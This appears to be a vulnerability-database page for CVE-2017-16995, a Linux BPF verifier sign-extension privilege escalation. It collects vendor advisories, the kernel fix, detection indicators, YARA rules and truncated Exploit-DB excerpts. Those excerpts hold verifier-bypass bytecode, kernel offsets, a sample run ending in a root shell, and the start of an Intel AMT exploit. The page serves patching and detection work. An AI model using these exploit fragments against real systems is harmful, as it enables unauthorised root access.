CVE-2017-16995
published 2017-12-27CVE-2017-16995: The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or…
PriorityP259high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
EXPLOIT
EPSS
30.05%
98.0th percentile
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | linux | < linux 4.14.7-1 (bookworm) | linux 4.14.7-1 (bookworm) |
| linux | linux_kernel | >= 0 < 4.14.7-1 | 4.14.7-1 |
| linux | linux_kernel | >= 0 < 4.14.7-1 | 4.14.7-1 |
| linux | linux_kernel | >= 0 < 4.14.7-1 | 4.14.7-1 |
| linux | linux_kernel | >= 0 < 4.14.7-1 | 4.14.7-1 |
| linux | linux_kernel | >= 0 < 4.4.0-119.143 | 4.4.0-119.143 |
| linux | linux_kernel | >= 4.10 < 4.14.9 | 4.14.9 |
| linux | linux_kernel | >= 4.9 < 4.9.72 | 4.9.72 |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xb4\x09\x00\x00\xff\xff\xff\xff\x55\x09\x02\x00\xff\xff\xff\xff\xb7\x00\x00\x00\x00\x00\x00\x00\x95\x00\x00\x00\x00\x00\x00\x00
- →Check whether kernel.unprivileged_bpf_disabled is set to 0 (permitting unprivileged BPF loading), which is a prerequisite for exploitation of CVE-2017-16995. ↗
- →Monitor for unprivileged processes invoking the bpf() syscall (__NR_bpf) with BPF_PROG_LOAD and BPF_PROG_TYPE_SOCKET_FILTER, which is the exploit's mechanism for loading a malicious BPF program. ↗
- →Alert on setsockopt calls with SO_ATTACH_BPF from unprivileged processes, used by the exploit to attach the malicious BPF program to a socket. ↗
- →Detect the BPF_DISABLE_VERIFIER macro pattern: a BPF program that loads 0xFFFFFFFF into a 32-bit register and immediately checks equality to bypass the verifier — this is the core sign-extension bypass technique. ↗
- →Monitor for processes writing to /proc/sys/kernel/unprivileged_bpf_disabled or reading kernel version strings (uname -r) followed by BPF syscall activity, which may indicate pre-exploitation reconnaissance. ↗
- →Flag use of PHYS_OFFSET constant 0xffff880000000000 in BPF programs or kernel memory reads, as both public exploit variants use this value to validate leaked kernel pointers. ↗
- →Detect credential-patching pattern: kernel memory writes zeroing uid/gid fields at credptr+UID_OFFSET (offset 4) after reading task_struct->cred at CRED_OFFSET (0x5f8), followed by execve of /bin/bash or /bin/sh. ↗
- →Vulnerable kernel range is 4.0 through 4.14.11 (exclusive); systems running kernels in this range with BPF support enabled should be prioritized for patching or mitigation. ↗
- ·Exploitation requires unprivileged BPF loading to be permitted. Setting kernel.unprivileged_bpf_disabled=1 prevents exploitation entirely. ↗
- ·The exploit only works on x86_64 architecture; other architectures are not affected. ↗
- ·The vulnerability is stated to be unexploitable on authentic grsecurity kernels; only counterfeit/KSPP-patched kernels are affected by the public exploits. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.8HIGH
vendor_debian7.8HIGH
vendor_redhat7.8HIGH
vendor_ubuntu7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Linux kernel (Intel Euclid) vulnerability
vendor_ubuntu·2018-04-24
CVE-2017-16995 Linux kernel (Intel Euclid) vulnerability
Title: Linux kernel (Intel Euclid) vulnerability
Summary: The system could be made to crash or run programs as an administrator.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed.
Unless you manually uninstalled the standard kernel metapackages
(e.g. linux-generic, li
Ubuntu
Linux kernel (Xenial HWE) vulnerabilities
vendor_ubuntu·2018-04-05·CVSS 7.8
CVE-2017-0861 [HIGH] Linux kernel (Xenial HWE) vulnerabilities
Title: Linux kernel (Xenial HWE) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
USN-3619-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04
LTS. This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu
14.04 LTS.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2018-04-04·CVSS 7.8
CVE-2017-0861 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could
Ubuntu
Linux kernel (Raspberry Pi 2) vulnerabilities
vendor_ubuntu·2018-01-10·CVSS 7.8
CVE-2017-16995 [HIGH] Linux kernel (Raspberry Pi 2) vulnerabilities
Title: Linux kernel (Raspberry Pi 2) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel did not properly check the relationship between pointer
values and the BPF stack. A local attacker could use this to cause a denial
of service (system crash) or possibly execute arbitrary code.
(CVE-2017-17863)
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
Alexei Starovoitov discovered that the Berkeley Packet Filter (BPF)
implementation in the Linu
Ubuntu
Linux kernel (HWE) vulnerabilities
vendor_ubuntu·2018-01-10·CVSS 7.8
CVE-2017-16995 [HIGH] Linux kernel (HWE) vulnerabilities
Title: Linux kernel (HWE) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
USN-3523-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10.
This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu
16.04 LTS.
Jann Horn discovered that microprocessors utilizing speculative execution
and indirect branch prediction may allow unauthorized memory reads via
sidechannel attacks. This flaw is known as Meltdown. A local attacker could
use this to expose sensitive information, including kernel memory.
(CVE-2017-5754)
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel did not properly check the relationship between pointer
values and the BPF stack. A lo
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2018-01-09·CVSS 7.8
CVE-2017-16995 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that microprocessors utilizing speculative execution
and indirect branch prediction may allow unauthorized memory reads via
sidechannel attacks. This flaw is known as Meltdown. A local attacker could
use this to expose sensitive information, including kernel memory.
(CVE-2017-5754)
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel did not properly check the relationship between pointer
values and the BPF stack. A local attacker could use this to cause a denial
of service (system crash) or possibly execute arbitrary code.
(CVE-2017-17863)
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux
Red Hat
kernel: memory corruption caused by BPF verifier bugs can allow for arbitrary code execution
vendor_redhat·2017-12-22·CVSS 7.8
CVE-2017-16995 [HIGH] CWE-787 kernel: memory corruption caused by BPF verifier bugs can allow for arbitrary code execution
kernel: memory corruption caused by BPF verifier bugs can allow for arbitrary code execution
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
An arbitrary memory r/w access issue was found in the Linux kernel compiled with the eBPF bpf(2) system call (CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation errors in the eBPF verifier module, triggered by user supplied malicious BPF program. An unprivileged user could use this flaw to escalate their privileges on a system. Setting parameter "kernel.unprivileged_bpf_disabled=1" prevents such privilege escalation by restricting access to bpf(2) c
Debian
CVE-2017-16995: linux - The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4...
vendor_debian·2017·CVSS 7.8
CVE-2017-16995 [HIGH] CVE-2017-16995: linux - The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4...
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
Scope: local
bookworm: resolved (fixed in 4.14.7-1)
bullseye: resolved (fixed in 4.14.7-1)
forky: resolved (fixed in 4.14.7-1)
sid: resolved (fixed in 4.14.7-1)
trixie: resolved (fixed in 4.14.7-1)
GHSA
GHSA-45mv-5p9c-6w7c: The check_alu_op function in kernel/bpf/verifier
ghsa_unreviewed·2022-05-13
CVE-2017-16995 [HIGH] CWE-119 GHSA-45mv-5p9c-6w7c: The check_alu_op function in kernel/bpf/verifier
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
OSV
linux-lts-xenial, linux-aws vulnerabilities
osv·2018-04-05·CVSS 7.8
[HIGH] linux-lts-xenial, linux-aws vulnerabilities
linux-lts-xenial, linux-aws vulnerabilities
USN-3619-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04
LTS. This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu
14.04 LTS.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-08
OSV
linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities
osv·2018-04-04·CVSS 7.8
CVE-2017-16995 [HIGH] linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities
linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial
OSV
linux-hwe, linux-azure, linux-gcp, linux-oem vulnerabilities
osv·2018-01-10·CVSS 7.8
[HIGH] linux-hwe, linux-azure, linux-gcp, linux-oem vulnerabilities
linux-hwe, linux-azure, linux-gcp, linux-oem vulnerabilities
USN-3523-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10.
This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu
16.04 LTS.
Jann Horn discovered that microprocessors utilizing speculative execution
and indirect branch prediction may allow unauthorized memory reads via
sidechannel attacks. This flaw is known as Meltdown. A local attacker could
use this to expose sensitive information, including kernel memory.
(CVE-2017-5754)
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel did not properly check the relationship between pointer
values and the BPF stack. A local attacker could use this to cause a denial
o
OSV
CVE-2017-16995: The check_alu_op function in kernel/bpf/verifier
osv·2017-12-27·CVSS 7.8
CVE-2017-16995 [HIGH] CVE-2017-16995: The check_alu_op function in kernel/bpf/verifier
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
Kernel
bpf: fix incorrect sign extension in check_alu_op()
kernel_security·2017-12-18·CVSS 7.8
CVE-2017-16995 [HIGH] bpf: fix incorrect sign extension in check_alu_op()
bpf: fix incorrect sign extension in check_alu_op()
Distinguish between
BPF_ALU64|BPF_MOV|BPF_K (load 32-bit immediate, sign-extended to 64-bit)
and BPF_ALU|BPF_MOV|BPF_K (load 32-bit immediate, zero-padded to 64-bit);
only perform sign extension in the first case.
Starting with v4.14, this is exploitable by unprivileged users as long as
the unprivileged_bpf_disabled sysctl isn't set.
Debian assigned CVE-2017-16995 for this issue.
v3:
- add CVE number (Ben Hutchings)
Fixes: 484611357c19 ("bpf: allow access into map value arrays")
Signed-off-by: Jann Horn
Acked-by: Edward Cree
Signed-off-by: Alexei Starovoitov
Signed-off-by: Daniel Borkmann
YARA
Linux_Exploit_CVE_2017_16995_0c81a317
yara·CVSS 7.8
CVE-2017-16995 [HIGH] Linux_Exploit_CVE_2017_16995_0c81a317
rule Linux_Exploit_CVE_2017_16995_0c81a317 {
meta:
author = "Elastic Security"
id = "0c81a317-b296-4cda-839c-a37903e86786"
fingerprint = "40d192607a7237c41c35d90a48cbcfd95a79c0fe7c8017d41389f15a78d620f5"
creation_date = "2021-01-12"
last_modified = "2021-09-16"
threat_name = "Linux.Exploit.CVE-2017-16995"
reference_sample = "48d927b4b18a03dfbce54bb5f4518869773737e449301ba2477eb797afbb9972"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { 55 48 89 E5 48 89 7D F8 48 8B 45 F8 48 25 00 C0 FF FF 5D C3 55 48 }
condition:
all of them
}
YARA
Linux_Exploit_CVE_2017_16995_82816caa
yara·CVSS 7.8
CVE-2017-16995 [HIGH] Linux_Exploit_CVE_2017_16995_82816caa
rule Linux_Exploit_CVE_2017_16995_82816caa {
meta:
author = "Elastic Security"
id = "82816caa-2fff-4b71-9544-443e611aacbf"
fingerprint = "1a716566946fdd368230c02e2c749b6ce371fa6211be6b3db137af9b117bec87"
creation_date = "2022-01-05"
last_modified = "2022-01-26"
threat_name = "Linux.Exploit.CVE-2017-16995"
reference_sample = "14e6b788db0db57067d9885ab5ff3d3a5749639549d82abd98fa4fcf27000f34"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { BC 89 45 C0 8B 45 B8 48 98 48 C1 E8 03 89 45 C4 48 8B 45 B0 48 }
condition:
all of them
}
YARA
Linux_Exploit_CVE_2017_16995_5edb0181
yara·CVSS 7.8
CVE-2017-16995 [HIGH] Linux_Exploit_CVE_2017_16995_5edb0181
rule Linux_Exploit_CVE_2017_16995_5edb0181 {
meta:
author = "Elastic Security"
id = "5edb0181-dfb1-47e2-873b-0fa3043bee67"
fingerprint = "804635a4922830b894ed38f58751f481d389e5bfbea7a50912763952971844e6"
creation_date = "2022-01-05"
last_modified = "2022-01-26"
threat_name = "Linux.Exploit.CVE-2017-16995"
reference_sample = "e4df84e1dffbad217d07222314a7e13fd74771a9111d07adc467a89d8ba81127"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { F8 2F 77 0F 45 89 C2 49 89 D1 41 83 C0 08 4A 8D 54 15 D0 48 }
condition:
all of them
}
Exploit-DB
Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)
exploitdb·2018-07-19
CVE-2017-16995 Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)
Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Linux BPF Sign Extension Local Privilege Escalation',
'Description' => %q{
Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)
which contains a vulnerability where it may improperly perform sign
extension. This can be utilized to escalate privileges.
The target system must be compiled with BPF support and must not have
kernel.unprivileged_bpf_disabled set to 1.
This module has been tested successfully on:
Debian 9.0 kernel 4.9.0-3-amd64;
Deepin 15.5 kernel 4.9.0-deepin13-amd64;
ElementaryOS 0.4.1 kernel 4.8.0-52-generic;
Fedora 25 kerne
Exploit-DB
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
exploitdb·2018-07-10
CVE-2017-16995 Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
Linux Kernel ffff880038c3f500
[*] Leaking sock struct from ffff88003af5e180
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880038704600
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880038704600
[*] credentials patched, launching shell...
#id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
char buffer[64];
int sockets[2];
int mapfd, progfd;
int doredact = 0;
#define LOG_BUF_SIZE 65536
#define PHYS_OFFSET 0xffff880000000000
char bpf_log_buf[LOG_BUF_SIZE];
static __u64 ptr_to_u64(void *ptr)
{
retur
Exploit-DB
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
exploitdb·2018-03-16
CVE-2017-16995 Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
Linux Kernel
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328
int sockets[2];
int mapfd, progfd;
char *__prog = "\xb4\x09\x00\x00\xff\xff\xff\xff"
"\x55\x09\x02\x00\xff\xff\xff\xff"
"\xb7\x00\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x18\x19\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x00\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x06\x00\x00\x00\x00\x0
Exploit-DB
Intel Active Management Technology - System Privileges
exploitdb·2017-05-10·CVSS 9.8
CVE-2017-5689 [CRITICAL] Intel Active Management Technology - System Privileges
Intel Active Management Technology - System Privileges
---
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Nixawk
# CVE-2017-5689 = {
# dork="Server: Intel(R) Active Management Technology" port:"16992",
# ports=[
# 623,
# 664,
# 16992,
# 16993,
# 16994,
# 16995
# ]
# products=[
# Active Management Technology (AMT),
# Intel Standard Manageability (ISM),
# Intel Small Business Technology (SBT)
# ]
# version=[
# 6.x,
# 7.x,
# 8.x,
# 9.x,
# 10.x,
# 11.0,
# 11.5,
# 11.6
# ]
import functools
import requests
import logging
import uuid
logging.basicConfig(level=logging.INFO, format="%(message)s")
log = logging.getLogger(__file__)
TIMEOUT = 8
def handle_exception(func):
functools.wraps(func)
def wrapper(*args, **kwds):
try:
return func(*args, **kwds)
except Exception as err:
log.error
Metasploit
Linux BPF Sign Extension Local Privilege Escalation
metasploit
Linux BPF Sign Extension Local Privilege Escalation
Linux BPF Sign Extension Local Privilege Escalation
Linux kernel prior to 4.14.8 contains a vulnerability in the Berkeley Packet Filter (BPF) verifier. The `check_alu_op` function performs incorrect sign extension which allows the verifier to be bypassed, leading to arbitrary kernel read/write. The target system must be compiled with BPF support and permit unprivileged access to BPF with `kernel.unprivileged_bpf_disabled` not set to 1. This module has been tested successfully on: Debian 9.0 kernel 4.9.0-3-amd64; Deepin 15.5 kernel 4.9.0-deepin13-amd64; ElementaryOS 0.4.1 kernel 4.8.0-52-generic; Fedora 24 kernel 4.5.5-300.fc24.x86_64; Fedora 25 kernel 4.8.6-300.fc25.x86_64; Fedora 26 kernel 4.11.8-300.fc26.x86_64; Fedora 27 kernel 4.13.9-300.fc27.x86_64; Gentoo 2.2 kernel 4.5.2-aufs-r; Li
arXiv
Rethinking Tamper-Evident Logging: A High-Performance, Co-Designed Auditing System
arxiv_fulltext·2025-09-05
Rethinking Tamper-Evident Logging: A High-Performance, Co-Designed Auditing System
Rethinking Tamper-Evident Logging: A High-Performance, Co-Designed Auditing System
Rui Zhao
University of Virginia
Charlottesville
USA
[email protected]
Muhammad Shoaib
University of Virginia
Charlottesville
USA
[email protected]
Viet Tung Hoang
Florida State University
Tallahassee
USA
[email protected]
Wajih Ul Hassan
University of Virginia
Charlottesville
USA
[email protected]
## Abstract
Existing tamper-evident logging systems suffer from high overhead and severe data loss in high-load settings,
yet only provide coarse-grained tamper detection.
Moreover, installing such systems requires
recompiling kernel code. To address these challenges, we present , a high-performance, tamper-evident audit logging system
that supports fine-grained detection of log tampering.
Even better,
arXiv
KernJC: Automated Vulnerable Environment Generation for Linux Kernel Vulnerabilities
arxiv_fulltext·2024-09-24
KernJC: Automated Vulnerable Environment Generation for Linux Kernel Vulnerabilities
: Automated Vulnerable Environment Generation for Linux Kernel Vulnerabilities
Bonan Ruan
National University of Singapore
Jiahao Liu
National University of Singapore
Chuqi Zhang
National University of Singapore
Zhenkai Liang
National University of Singapore
## Abstract
Linux kernel vulnerability reproduction is a critical task in system security.
To reproduce a kernel vulnerability, the vulnerable environment and the Proof of Concept (PoC) program are needed.
Most existing research focuses on the generation of PoC, while the construction of environment is overlooked.
However, establishing an effective vulnerable environment to trigger a vulnerability is challenging.
Firstly, it is hard to guarantee that the selected kernel version for reproduction is vulnerable, as the vulner
CTF
medium / README
ctf_writeups·CVSS 9.1
[CRITICAL] medium / README
---
layout: default
title: Medium Machines
parent: Machines
nav_order: 2
description: "112+ Medium HTB machine writeups with walkthroughs"
permalink: /machines/medium/
---
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
Bashed / README
ctf_writeups
Bashed / README
HTB 8. Bashed
1. `nmap -A -T4 -p- 10.10.10.68` shows port 80 with `Apache httpd 2.4.18 (Ubuntu)`.
2. `searchsploit apache 2.4` reveals local `apache_ctl` exploit.
3. Going to website `10.10.10.68` and looking at content shows that `10.10.10.68/uploads`. exists.
4. `dirbuster` time with medium wordlist which reveals several folders.
5. View source code of pages shows nothing.
6. `dirbuster` found `dev/phpbash.php`.
7. Go to `10.10.10.68` and launch `phpbash.php` which launches web terminal.
8. `whoami` is `www-data` so lets get the user flag. `cat /home/arrexel/user.txt`.
9. test `sudo -l` and `history` which shows we can become `scriptmanager` user without password.
10. Can't change to `scriptmanager` because we are in a wbeshell without a tty.
11. `cd /var/www/html/uploads/` and upload p
CTF
README
ctf_writeups·CVSS 9.8
[CRITICAL] README
# Boot to root CTFs
Walkthroughs and notes of 'boot to root' CTFs mostly from VulnHub that I did for fun. I like to use vulnerable VMs from VulnHub (in addition to the ones I create) to organize hands-on penetration testing training sessions for junior security auditors/consultants :-)
### >> Classic pentest methodology to do a Boot2root CTF upload a Webshell)
➤ Clear-text passwords stored in 'public' website pages, configuration files, log files
➤ ...
2. Exploiting unpatched known vulnerabilities
➤ Web server (e.g. Apache Struts RCE: CVE-2017-12611/CVE-2017-9805/CVE-2017-9791, JBoss Java Deserialization RCE)
➤ Bash & web server CGI (e.g. Shellshock RCE CVE-2014-6271/CVE-2014-7169)
➤ Web CMS (e.g. Drupalgeddon2 RCE CVE-2018-7600)
➤ Web framework (e.g. PHP CGI RCE CVE-2012-1823)
➤ FTP s
Bugzilla
CVE-2017-16995 kernel: memory corruption caused by BPF verifier bugs can allow for arbitrary code execution [fedora-all]
bugzilla·2017-12-22·CVSS 7.8
CVE-2017-16995 [HIGH] CVE-2017-16995 kernel: memory corruption caused by BPF verifier bugs can allow for arbitrary code execution [fedora-all]
CVE-2017-16995 kernel: memory corruption caused by BPF verifier bugs can allow for arbitrary code execution [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: thi
Bugzilla
CVE-2017-16995 kernel: memory corruption caused by BPF verifier bugs can allow for arbitrary code execution
bugzilla·2017-12-22·CVSS 7.8
CVE-2017-16995 [HIGH] CVE-2017-16995 kernel: memory corruption caused by BPF verifier bugs can allow for arbitrary code execution
CVE-2017-16995 kernel: memory corruption caused by BPF verifier bugs can allow for arbitrary code execution
Linux kernel built with the eBPF bpf(2) system call(CONFIG_BPF_SYSCALL) support
is vulnerable to an arbitrary memory r/w access issue. It could occur if a user supplied a malicious BPF program which results calculations error in eBPF verifier module.
An unprivileged user could use this flaw to escalate their privileges on a system.
Upstream patch
-> https://git.kernel.org/linus/3db9128fcf02dcaafa3860a69a8a55d5529b6e30
References:
-> http://seclists.org/oss-sec/2017/q4/429
-> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16995
-> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16995
-> https://bugs.chromium.org/p/project-zero/issues/detail?id=1454
Mitigation:
#
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6fhttp://openwall.com/lists/oss-security/2017/12/21/2http://www.securityfocus.com/bid/102288https://bugs.chromium.org/p/project-zero/issues/detail?id=1454https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=a6132276ab5dcc38b3299082efeb25b948263adbhttps://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6fhttps://usn.ubuntu.com/3619-1/https://usn.ubuntu.com/3619-2/https://usn.ubuntu.com/3633-1/https://usn.ubuntu.com/usn/usn-3523-2/https://www.debian.org/security/2017/dsa-4073https://www.exploit-db.com/exploits/44298/https://www.exploit-db.com/exploits/45010/https://www.exploit-db.com/exploits/45058/http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6fhttp://openwall.com/lists/oss-security/2017/12/21/2http://www.securityfocus.com/bid/102288https://bugs.chromium.org/p/project-zero/issues/detail?id=1454https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=a6132276ab5dcc38b3299082efeb25b948263adbhttps://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6fhttps://usn.ubuntu.com/3619-1/https://usn.ubuntu.com/3619-2/https://usn.ubuntu.com/3633-1/https://usn.ubuntu.com/usn/usn-3523-2/https://www.debian.org/security/2017/dsa-4073https://www.exploit-db.com/exploits/44298/https://www.exploit-db.com/exploits/45010/https://www.exploit-db.com/exploits/45058/
2017-12-27
Published